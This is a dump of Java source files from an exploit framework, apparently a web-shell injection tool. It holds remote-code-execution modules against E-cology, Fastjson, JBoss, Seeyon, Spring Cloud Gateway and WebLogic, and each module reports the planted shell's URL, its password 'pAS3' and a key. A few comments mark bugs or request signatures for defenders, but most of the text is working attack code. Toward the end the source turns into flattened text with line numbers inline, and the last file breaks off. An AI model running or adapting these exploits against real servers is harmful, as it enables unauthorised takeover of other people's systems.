import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * Module for the E-cology BeanShell servlet. The payload is POSTed as the
 * {@code bsh.script} form field to {@code /bsh.servlet.BshServlet}; the probe
 * then GETs {@code /xxx} and looks for {@code "Success"}.
 *
 * NOTE(review): the probe hits {@code /xxx} but the reported Shell_Url says
 * {@code /xxxx}; one of the two is presumably a typo.
 */
public class ECology_BeanShell_RCE extends BaseExp implements AttackBase {

    /**
     * Delivers the payload and verifies the result.
     *
     * @param stripUrl    base URL
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     */
    public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) {
        Object payload = null;
        try {
            payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            header.put("Accept", "*/*");
            String mime = "application/x-www-form-urlencoded; charset=utf-8";
            // The script is concatenated without URL-encoding despite the form Content-Type.
            String payloadString = "bsh.script=" + (String)payload;
            this.launch(stripUrl + "/bsh.servlet.BshServlet" , payloadString, mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/xxx", header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/xxxx"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /** Reads the four parameters from {@code params}; {@code target} is used without normalisation. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");
        this.attack(target, gadgetType, payloadType, trojanType);
    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/fastjson/Fastjson_AutoType_ByPass.java:
--------------------------------------------------------------------------------
package exp.fastjson;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;
import utils.okhttplib.OkHttp;

import java.io.IOException;
import java.util.HashMap;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Module for Fastjson. {@link #detectVersion} sends a deliberately truncated
 * JSON document and greps the error response for {@code version <n>};
 * {@link #run} then tries a fixed list of template names in order until one
 * {@link #attack} reports success. Both requests go to {@code target} itself.
 *
 * Defender note: a {@code {"@type":"java.lang.AutoCloseable"} fragment that is
 * not valid JSON, followed by a request carrying {@code X-Requested-With:
 * XmlHTTPRequest}, is the visible on-the-wire shape of this module.
 */
public class Fastjson_AutoType_ByPass extends BaseExp implements AttackBase {

    /**
     * Fingerprints the Fastjson version from the parser's error text and queues
     * a {@code FastJson Version is:} message (always, via {@code finally}).
     *
     * NOTE(review): {@code response.close()} runs after the try block even when
     * {@code launch} threw, in which case {@code response} is still {@code null}
     * and this method ends with a NullPointerException.
     *
     * @param target URL to send the probe to
     */
    public void detectVersion(String target){
        String version = "UnKnow";
        String payload = "{\"@type\":\"java.lang.AutoCloseable\"";
        HashMap header = new HashMap();
        header.put("Cache-Control", "max-age=0");
        header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
        header.put("Accept-Encoding", "gzip, deflate");
        header.put("Accept-Language", "zh-CN,zh;q=0.9");

        String mime = "application/json; charset=utf-8";
        // sendRequest
        Response response = null;
        try {
            response = this.launch(target, payload.toString(), mime, header);
            String bodyResult = response.body().string();
            String pattern = "version ([\\d.]+)";
            Pattern r = Pattern.compile(pattern);
            Matcher matcher = r.matcher(bodyResult);
            if(matcher.find()){
                version = matcher.group().split(" ")[1];
            }
        } catch (IOException e) {
            e.printStackTrace();
        } catch (Exception e) {
            e.printStackTrace();
        }
        finally {
            Util.messageQueue.add(String.format("FastJson Version is: %s \n", version));
        }
        response.close();
    }

    /**
     * Delivers one payload variant and verifies it.
     *
     * @param target      URL that receives both the payload and the probe
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     * @return {@code true} only when the probe body contains {@code "Success"}
     */
    public boolean attack(String target, String gadgetType, String payloadType, String trojanType) {
        boolean success = false;
        Object payload = null;
        try {
            payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            String mime = "application/json; charset=utf-8";
            this.launch(target ,payload.toString(), mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(target, header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                success = true;
                Util.messageQueue.add(String.format("Shell_Url: %s\n", target));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
        return success;
    }

    /**
     * Fingerprints the version, then tries each template name below in order
     * and stops at the first success. {@code trojanType} is not read from
     * {@code params} here.
     */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String [] trojanTypes = new String[]{
                "FastJson_1224",
                "FastJson_1224_2",
                "FastJson_1224_3",
                "FastJson_1224_4",
                "FastJson_1247",
                "FastJson_1247_2",
                "FastJson_1247_3",
                "FastJson_1247_4"
        };
        String gadgetType = params.get("gadgetType");
        String payloadType = params.get("payloadType");
        this.detectVersion(target);
        for (String trojanType: trojanTypes){
            if (this.attack(target, gadgetType,payloadType, trojanType)) break;
        }
    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/jboss/JBoss_CVE_2017_12149.java:
--------------------------------------------------------------------------------
package exp.jboss;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import ui.Config;
import utils.Util;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * Module for JBoss CVE-2017-12149. The serialized payload bytes are POSTed to
 * {@code /invoker/readonly}; the probe then GETs {@code /invoker/} and looks
 * for {@code "Success"}. With {@code gadgetType == "all"} every entry of
 * {@code Config.CommonsGadget} is tried in turn until one succeeds.
 *
 * Defender note: a POST to {@code /invoker/readonly} with a form Content-Type
 * but a Java-serialized body is the delivery shape; the gadget name is echoed
 * in the module's own output, not on the wire.
 */
public class JBoss_CVE_2017_12149 extends BaseExp implements AttackBase {
    /**
     * Delivers one gadget variant and verifies it.
     *
     * @param stripUrl    normalised origin
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     * @return {@code true} only when the probe body contains {@code "Success"}
     */
    public boolean attack(String stripUrl, String gadgetType, String payloadType, String trojanType) {
        byte[] payload = null;
        try {
            payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            header.put("Accept", "*/*");
            String mime = "application/x-www-form-urlencoded; charset=utf-8";
            this.launchPostByte(stripUrl + "/invoker/readonly" , payload, mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/invoker/", header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Gadget: %s\n", gadgetType));
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/invoker/"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
                return true;
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
        return false;
    }

    /**
     * Tries every gadget in {@code Config.CommonsGadget} except the literal
     * {@code "all"} and stops at the first success.
     */
    public void sendAllGadget(String stripUrl, String payloadType, String trojanType){
        for(String gadget: Config.CommonsGadget){
            if (gadget.equalsIgnoreCase("all"))continue;
            if (this.attack(stripUrl, gadget, payloadType, trojanType)){
                break;
            }
        }
    }

    /** Reads the four parameters, normalises {@code target}, and dispatches on {@code gadgetType}. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");

        String stripUrl = this.getStripUrl(target);

        if (gadgetType.equalsIgnoreCase("all")){
            this.sendAllGadget(stripUrl, payloadType, trojanType);
        }
        else {
            this.attack(stripUrl, gadgetType, payloadType, trojanType);

        }

    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/jboss/JBoss_CVE_2017_7504.java:
--------------------------------------------------------------------------------
package exp.jboss;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import ui.Config;
import utils.Util;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * Module for JBoss CVE-2017-7504. Same structure as {@link JBoss_CVE_2017_12149}
 * but both delivery (POST of serialized bytes) and probe (GET) go to
 * {@code /jbossmq-httpil/HTTPServerILServlet}; no {@code Cache-Control}
 * header and no charset on the Content-Type.
 */
public class JBoss_CVE_2017_7504 extends BaseExp implements AttackBase {
    /**
     * Delivers one gadget variant and verifies it.
     *
     * @param stripUrl    normalised origin
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     * @return {@code true} only when the probe body contains {@code "Success"}
     */
    public boolean attack(String stripUrl, String gadgetType, String payloadType, String trojanType) {
        byte[] payload = null;
        try {
            payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            header.put("Accept", "*/*");
            String mime = "application/x-www-form-urlencoded";
            this.launchPostByte(stripUrl + "/jbossmq-httpil/HTTPServerILServlet" , payload, mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/jbossmq-httpil/HTTPServerILServlet", header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Gadget: %s\n", gadgetType));
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/jbossmq-httpil/HTTPServerILServlet"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
                return true;
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
        return false;
    }

    /**
     * Tries every gadget in {@code Config.CommonsGadget} except the literal
     * {@code "all"} and stops at the first success.
     */
    public void sendAllGadget(String stripUrl, String payloadType, String trojanType){
        for(String gadget: Config.CommonsGadget){
            if (gadget.equalsIgnoreCase("all"))continue;
            if (this.attack(stripUrl, gadget, payloadType, trojanType)){
                break;
            }
        }
    }


    /** Reads the four parameters, normalises {@code target}, and dispatches on {@code gadgetType}. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");

        String stripUrl = this.getStripUrl(target);

        if (gadgetType.equalsIgnoreCase("all")){
            this.sendAllGadget(stripUrl, payloadType, trojanType);
        }
        else {
            this.attack(stripUrl, gadgetType, payloadType, trojanType);
        }

    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/seeyon/Seeyon_Unauthorized_RCE.java:
--------------------------------------------------------------------------------
package exp.seeyon;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;
import utils.okhttplib.OkHttp;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * Module for Seeyon. The payload bytes are POSTed as a string to the
 * {@code ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip}
 * endpoint reached through a {@code /..;/} path segment; the probe then GETs
 * {@code /common/all-min.css} and looks for {@code "Success"}.
 *
 * Defender note: the {@code /autoinstall.do.zxc/..;/ajax.do} path shape and the
 * {@code X-Requested-With: XmlHTTPRequest} probe against a static CSS path are
 * the visible request signatures.
 */
public class Seeyon_Unauthorized_RCE extends BaseExp implements AttackBase {

    /**
     * Delivers the payload and verifies the result.
     *
     * @param target      base URL (used verbatim, no normalisation)
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     */
    public void attack(String target, String gadgetType, String payloadType, String trojanType) {
        byte[] payload = null;
        try {
            payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            String mime = "application/x-www-form-urlencoded; charset=utf-8";
            // new String(byte[]) uses the platform default charset, so bytes that are
            // not valid in that charset do not survive this conversion.
            this.launch(target +
                    "/autoinstall.do.zxc/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip",
                    new String(payload), mime, header);
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(target + "/common/all-min.css", header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Shell_Url: %s\n", target + "/common/all-min.css"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /** Reads the four parameters from {@code params}; {@code target} is used without normalisation. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");
        this.attack(target, gadgetType, payloadType, trojanType);
    }

}
--------------------------------------------------------------------------------
/src/main/java/exp/springgateway/SpringGateWay_CVE_2022_22947.java:
--------------------------------------------------------------------------------
package exp.springgateway;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * Module for Spring Cloud Gateway CVE-2022-22947. A route named after the random
 * {@code trojanType} is created with a JSON POST to
 * {@code /actuator/gateway/routes/<trojanType>}, then
 * {@code /actuator/gateway/refresh} is POSTed. For {@code Netty} payload types
 * the module reports without verifying; otherwise it POSTs to
 * {@code /<trojanType>} and treats a body containing {@code "null"} (quoted) as
 * success.
 *
 * Defender note: unauthenticated writes to {@code /actuator/gateway/routes/*}
 * followed by {@code /actuator/gateway/refresh} are the visible signature;
 * the module leaves the created route in place.
 */
public class SpringGateWay_CVE_2022_22947 extends BaseExp implements AttackBase {

    /**
     * Creates the route, refreshes, and verifies (unless a Netty payload type).
     *
     * @param stripUrl    normalised origin
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector; {@code "Netty"} in the name skips verification
     * @param trojanType  random 4-char route id chosen in {@link #run}
     */
    public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) {
        Object payload = null;
        try {
            payload = GeneratePayload.generatePayloadByte(gadgetType, payloadType, trojanType);
            HashMap header = new HashMap();
            header.put("Cache-Control", "max-age=0");
            header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36");
            header.put("Accept-Encoding", "gzip, deflate");
            header.put("Accept-Language", "zh-CN,zh;q=0.9");
            String mime = "application/json";
            // String payloadString = payload.toString();
            // Platform default charset conversion of the payload bytes.
            String payloadString = new String((byte[])payload);
            this.launch(stripUrl + "/actuator/gateway/routes/" + trojanType,payloadString, mime, header);
            mime = "application/x-www-form-urlencoded";
            this.launch(stripUrl + "/actuator/gateway/refresh","", mime, header);
            if(payloadType.contains("Netty")){
                // No verification request for Netty payloads; the user is told to check manually.
                Util.messageQueue.add("请自行验证, 多次尝试(1+)!!!\n");
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/" + trojanType));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
                return;
            }
            header.put("X-Requested-With", "XmlHTTPRequest");
            // "tyr" is an extra custom header; its purpose is not visible here.
            header.put("tyr", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/" + trojanType, "", mime, header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("\"null\"")) {
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/" + trojanType));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /** Reads {@code target}, {@code payloadType}, {@code gadgetType}; {@code trojanType} is a random 4-character id. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");
        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = Util.getRandomString(4);
        String stripUrl = this.getStripUrl(target);
        this.attack(stripUrl, gadgetType, payloadType, trojanType);
    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/weblogic/Weblogic_0Day_1.java:
--------------------------------------------------------------------------------
package exp.weblogic;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;
import utils.okhttplib.OkHttp;
import utils.weblogic.IIOPProtocolOperation;
import utils.weblogic.T3ProtocolOperation;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * WebLogic module. The payload is sent over T3 (serialized with
 * {@code Util.serialize}) or IIOP depending on {@code protocol}; any other
 * value sends nothing. The HTTP probe is a POST to {@code /console/css/login.css}
 * looking for {@code "Success"}.
 *
 * NOTE(review): the inner {@code catch (Exception e){}} swallows every delivery
 * error silently, so the probe runs and reports "注入失败" even when nothing
 * was sent.
 */
public class Weblogic_0Day_1 extends BaseExp implements AttackBase {
    /**
     * Delivers over the chosen protocol and verifies over HTTP.
     *
     * @param protocol    {@code "t3"} or {@code "iiop"} (case-insensitive)
     * @param stripUrl    normalised origin; host and port are re-parsed from it
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     */
    public void attack(String protocol, String stripUrl, String gadgetType, String payloadType, String trojanType) {
        Object payload = null;
        String[] ipAndPort = Util.getIPAndPortFromBase(stripUrl);
        String host = ipAndPort[0];
        String port = ipAndPort[1];
        try {
            try {
                payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType);
                if (protocol.equalsIgnoreCase("t3")) {
                    //T3 send
                    T3ProtocolOperation.send(protocol, host, port, Util.serialize(payload));
                } else if (protocol.equalsIgnoreCase("iiop")) {
                    IIOPProtocolOperation.send(host,port, payload);
                }
            }catch (Exception e){}
            HashMap header = new HashMap();
            String mime = "application/x-www-form-urlencoded";
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /** Reads the four parameters plus {@code protocol}, normalises {@code target}, and delegates to {@link #attack}. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");

        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");
        String protocol = params.get("protocol");
        String stripUrl = this.getStripUrl(target);
        this.attack(protocol, stripUrl, gadgetType, payloadType, trojanType);

    }

}
--------------------------------------------------------------------------------
/src/main/java/exp/weblogic/Weblogic_CVE_2020_14756.java:
--------------------------------------------------------------------------------
package exp.weblogic;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util;
import utils.weblogic.IIOPProtocolOperation;
import utils.weblogic.T3ProtocolOperation;

import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;

/**
 * Module for WebLogic CVE-2020-14756. The code is identical to
 * {@link Weblogic_0Day_1} (T3/IIOP delivery, HTTP probe of
 * {@code /console/css/login.css}); only the class name differs in what is
 * visible here, so presumably the payload templates selected by name differ.
 */
public class Weblogic_CVE_2020_14756 extends BaseExp implements AttackBase {
    /**
     * Delivers over the chosen protocol and verifies over HTTP.
     *
     * @param protocol    {@code "t3"} or {@code "iiop"} (case-insensitive)
     * @param stripUrl    normalised origin; host and port are re-parsed from it
     * @param gadgetType  gadget selector for {@code GeneratePayload}
     * @param payloadType payload selector for {@code GeneratePayload}
     * @param trojanType  template selector for {@code GeneratePayload}
     */
    public void attack(String protocol, String stripUrl, String gadgetType, String payloadType, String trojanType) {
        Object payload = null;
        String[] ipAndPort = Util.getIPAndPortFromBase(stripUrl);
        String host = ipAndPort[0];
        String port = ipAndPort[1];
        try {
            try {
                payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType);
                if (protocol.equalsIgnoreCase("t3")) {
                    //T3 send
                    T3ProtocolOperation.send(protocol, host, port, Util.serialize(payload));
                } else if (protocol.equalsIgnoreCase("iiop")) {
                    IIOPProtocolOperation.send(host,port, payload);
                }
            }catch (Exception e){}
            // Delivery failures are swallowed above; the probe always runs.
            HashMap header = new HashMap();
            String mime = "application/x-www-form-urlencoded";
            header.put("X-Requested-With", "XmlHTTPRequest");
            Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header);
            String bodyResult = response.body().string();
            response.close();
            if (bodyResult.contains("Success")) {
                Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css"));
                Util.messageQueue.add(String.format("PassWord: pAS3\n"));
                Util.messageQueue.add(String.format("Key: key\n"));
                Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n"));
                Util.messageQueue.add("---------------------------\n");
            }else {
                Util.messageQueue.add("注入失败");
            }

        }catch (Exception e){
            Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage()));
        }
    }

    /** Reads the four parameters plus {@code protocol}, normalises {@code target}, and delegates to {@link #attack}. */
    @Override
    public void run(HashMap params) {
        String target = params.get("target");

        String payloadType = params.get("payloadType");
        String gadgetType = params.get("gadgetType");
        String trojanType = params.get("trojanType");
        String protocol = params.get("protocol");
        String stripUrl = this.getStripUrl(target);
        this.attack(protocol, stripUrl, gadgetType, payloadType, trojanType);

    }
}
--------------------------------------------------------------------------------
/src/main/java/exp/weblogic/Weblogic_CVE_2020_14883.java:
--------------------------------------------------------------------------------
package exp.weblogic;

import core.GeneratePayload;
import exp.AttackBase;
import exp.BaseExp;
import okhttp3.Response;
import utils.Util; 8 | import utils.okhttplib.OkHttp; 9 | 10 | import java.lang.reflect.InvocationTargetException; 11 | import java.util.HashMap; 12 | 13 | public class Weblogic_CVE_2020_14883 extends BaseExp implements AttackBase { 14 | 15 | public void attack(String stripUrl, String gadgetType, String payloadType, String trojanType) { 16 | Object payload = null; 17 | try { 18 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 19 | HashMap header = new HashMap(); 20 | header.put("Cache-Control", "max-age=0"); 21 | header.put("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36"); 22 | header.put("Accept-Encoding", "gzip, deflate"); 23 | header.put("Accept-Language", "zh-CN,zh;q=0.9"); 24 | String mime = "application/x-www-form-urlencoded; charset=utf-8"; 25 | this.launch(stripUrl, payload.toString(), mime, header); 26 | Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header); 27 | String bodyResult = response.body().string(); 28 | response.close(); 29 | if (bodyResult.contains("Success")) { 30 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css")); 31 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 32 | Util.messageQueue.add(String.format("Key: key\n")); 33 | Util.messageQueue.add(String.format("header: X-Requested-With:XMLHTTPRequest\n")); 34 | Util.messageQueue.add("---------------------------\n"); 35 | }else { 36 | Util.messageQueue.add("注入失败"); 37 | } 38 | 39 | }catch (Exception e){ 40 | Util.messageQueue.add(String.format("注入过程发生错误: %s", e.getMessage())); 41 | } 42 | } 43 | 44 | @Override 45 | public void run(HashMap params) { 46 | String target = params.get("target"); 47 | String payloadType = params.get("payloadType"); 48 | String gadgetType = params.get("gadgetType"); 49 | String trojanType = params.get("trojanType"); 50 | String stripUrl = this.getStripUrl(target); 51 
| this.attack(stripUrl, gadgetType, payloadType, trojanType); 52 | 53 | } 54 | } 55 | -------------------------------------------------------------------------------- /src/main/java/exp/weblogic/Weblogic_CVE_2020_2883.java: -------------------------------------------------------------------------------- 1 | package exp.weblogic; 2 | 3 | 4 | import core.GeneratePayload; 5 | import exp.AttackBase; 6 | import exp.BaseExp; 7 | import okhttp3.Response; 8 | import utils.Util; 9 | import utils.weblogic.IIOPProtocolOperation; 10 | import utils.weblogic.T3ProtocolOperation; 11 | 12 | import java.lang.reflect.InvocationTargetException; 13 | import java.util.HashMap; 14 | 15 | public class Weblogic_CVE_2020_2883 extends BaseExp implements AttackBase { 16 | public void attack(String protocol, String stripUrl, String gadgetType, String payloadType, String trojanType) { 17 | Object payload = null; 18 | String[] ipAndPort = Util.getIPAndPortFromBase(stripUrl); 19 | String host = ipAndPort[0]; 20 | String port = ipAndPort[1]; 21 | try { 22 | try { 23 | payload = GeneratePayload.generatePayload(gadgetType, payloadType, trojanType); 24 | if (protocol.equalsIgnoreCase("t3")) { 25 | //T3 send 26 | T3ProtocolOperation.send(protocol, host, port, Util.serialize(payload)); 27 | } else if (protocol.equalsIgnoreCase("iiop")) { 28 | IIOPProtocolOperation.send(host,port, payload); 29 | } 30 | }catch (Exception e){} 31 | 32 | HashMap header = new HashMap(); 33 | String mime = "application/x-www-form-urlencoded"; 34 | header.put("X-Requested-With", "XmlHTTPRequest"); 35 | Response response = this.launch(stripUrl + "/console/css/login.css", "", mime, header); 36 | String bodyResult = response.body().string(); 37 | response.close(); 38 | if (bodyResult.contains("Success")) { 39 | Util.messageQueue.add(String.format("Shell_Url: %s\n", stripUrl + "/console/css/login.css")); 40 | Util.messageQueue.add(String.format("PassWord: pAS3\n")); 41 | Util.messageQueue.add(String.format("Key: key\n")); 42 | 
